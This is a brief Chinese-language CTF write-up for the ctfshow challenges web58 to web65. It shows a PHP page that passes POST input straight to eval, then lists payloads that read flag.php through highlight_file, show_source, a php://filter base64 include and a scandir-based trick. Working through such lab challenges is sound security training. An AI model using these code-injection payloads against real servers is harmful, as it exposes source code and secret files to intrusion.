ctfshow web58-65
题目都是一样的,解法也一样,很奇怪了
web58
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
下面是一些解法:
c=highlight_file("flag.php");
c=show_source("flag.php");
c=include($_POST['1']);&1=php://filter/convert.base64-encode/resource=flag.php
(但是 data://text/plain 被禁用了)
还可以利用数组:
c=show_source(next(array_reverse(scandir(getcwd()))));
web59-65
题目都和web58一样,不知道禁用了什么函数
payload都是:
c=show_source(“flag.php”);